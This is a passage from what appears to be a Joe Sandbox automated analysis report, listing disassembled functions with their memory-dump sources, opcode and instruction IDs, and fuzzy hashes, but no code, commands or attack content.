                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                                    • Instruction ID: e9df952ffaed1957344297e83c54f8c6300ec0fcc285bb68011d6491f2d92d38
                                    • Opcode Fuzzy Hash: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                                    • Instruction Fuzzy Hash: CEB19372A083515BD308CF25C4917ABF7E2EFC8310F1AC93EF89997295DB74D9419A82
                                    Function 006B1D78 Relevance: .3, Instructions: 291COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                                    • Instruction ID: 27b3c68840afc333e555a480ea6a21f3afc73289e19c6912b723c98bf2a07c77
                                    • Opcode Fuzzy Hash: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                                    • Instruction Fuzzy Hash: F3B192B2A083115BD308CF25C89179BF7E2EFC8310F5AC93EE89997291D774D9459B82
                                    Function 006B2138 Relevance: .3, Instructions: 284COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                                    • Instruction ID: 7df1e71fb8b0565876fa6c8e41e3c9561e3296d9c106866470272864102add2d
                                    • Opcode Fuzzy Hash: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                                    • Instruction Fuzzy Hash: 99B13871A097128FD706EE3DC491259F7E1AFE6280F50C72EE995B7762EB31E8818740
                                    Function 006F1EE8 Relevance: .3, Instructions: 274COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
                                    • Instruction ID: e3f6e6a24d9a335c30b603a011cc796e3bc7ad45d73d2bbf78921d1a7e949a96
                                    • Opcode Fuzzy Hash: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
                                    • Instruction Fuzzy Hash: 8991E8B1A0021A8BDF14CE98DC90BBA73A2BF55304F154568EF18AB386D731DD45CFA5
                                    Function 007096FD Relevance: .3, Instructions: 269COMMONLIBRARYCODE
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                    • Instruction ID: 19fc00cc890ee2a7a7e690450cf7bde559df825f05be7955288943c71b1352a3
                                    • Opcode Fuzzy Hash: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                    • Instruction Fuzzy Hash: C5B1F731620609DFD715CF28C48AB657BE1FF45364F298658EA99CF2E2C339E991CB40
                                    Function 006DB198 Relevance: .3, Instructions: 268COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                    • Instruction ID: 4c82bb1a2b3539d7c34d4795100eec465999e8c8570e1d9d6ad75512f58ef18e
                                    • Opcode Fuzzy Hash: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                    • Instruction Fuzzy Hash: 53C14A75A0471A8FC715DF28C08045AB3F2FF88350F258A6DE8999B721D731E996CF81
                                    Function 006ED5A8 Relevance: .3, Instructions: 258COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                    • Instruction ID: eb4d132f2d9bff6d4383034cdcba7a5d4b4451c960eb3e01b501f7db0e8cf564
                                    • Opcode Fuzzy Hash: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                    • Instruction Fuzzy Hash: E89178309297D0AAEB168B3DCC427BAB795FFE6350F14C31AF98872591FB7186818344
                                    Function 006FD39E Relevance: .2, Instructions: 242COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                    • Instruction ID: 4ad6ae0ed37039394555b9b2b76ba27a2018b882163f18fc5b52e5050f604229
                                    • Opcode Fuzzy Hash: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                    • Instruction Fuzzy Hash: B0A11E72A10A19CBEB19CF55CCC5AAABBF2FB54314F14C62AD51AE73A0D334A944CF50
                                    Function 006C4288 Relevance: .2, Instructions: 240COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                    • Instruction ID: a3d8015b7b40e3ad52ae2c5485ff20f53aa1aab746d5e78c3cd4180f0e7f5396
                                    • Opcode Fuzzy Hash: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                    • Instruction Fuzzy Hash: 68A17F72E083519BD308CF25C89075BF7E2EFC8710F5ACA3DA89997254D774E9419B82
                                    Function 00A3281C Relevance: .2, Instructions: 238COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 887b165019d03966a8f669f2849d4020af8e03231df9361c80367d07f25020da
                                    • Instruction ID: a351ebd9cabd22385f95727452dcb14e7e560d436a6a10c5de12e79c4def1536
                                    • Opcode Fuzzy Hash: 887b165019d03966a8f669f2849d4020af8e03231df9361c80367d07f25020da
                                    • Instruction Fuzzy Hash: 24613AB3A182145FE3146A3DEC5477ABBD6EBC4720F2B463EEAC4D3780E935580586C6
                                    Function 009C1C09 Relevance: .2, Instructions: 225COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 42002c225bfbe458d9ea1c1e3624872d085b6e07e087c443ec6777b90b9bd609
                                    • Instruction ID: ffe7963eeaaa2a0b9c1e40a98da760c5ce892a34574d2da133c4d837302e0447
                                    • Opcode Fuzzy Hash: 42002c225bfbe458d9ea1c1e3624872d085b6e07e087c443ec6777b90b9bd609
                                    • Instruction Fuzzy Hash: 64614DF3E082109BE3186E2DEC4576BB7D5DB94320F1A463DEEC897784E9399C1186C6
                                    Function 00BA7C2A Relevance: .2, Instructions: 205COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 86811f0cdaa1394a4eea334e74edd86ea9c3554ccd5b1aea8eb94315f160c79a
                                    • Instruction ID: deb16934b3d7e48924d389151d80bcb8c996dec45080efc6ec24b206ac780f5f
                                    • Opcode Fuzzy Hash: 86811f0cdaa1394a4eea334e74edd86ea9c3554ccd5b1aea8eb94315f160c79a
                                    • Instruction Fuzzy Hash: 8E515BF368C101EFD2085E28EDD593AB7D9EB46320F3185BEE9C786740FD215C006692
                                    Function 00AA6645 Relevance: .2, Instructions: 194COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
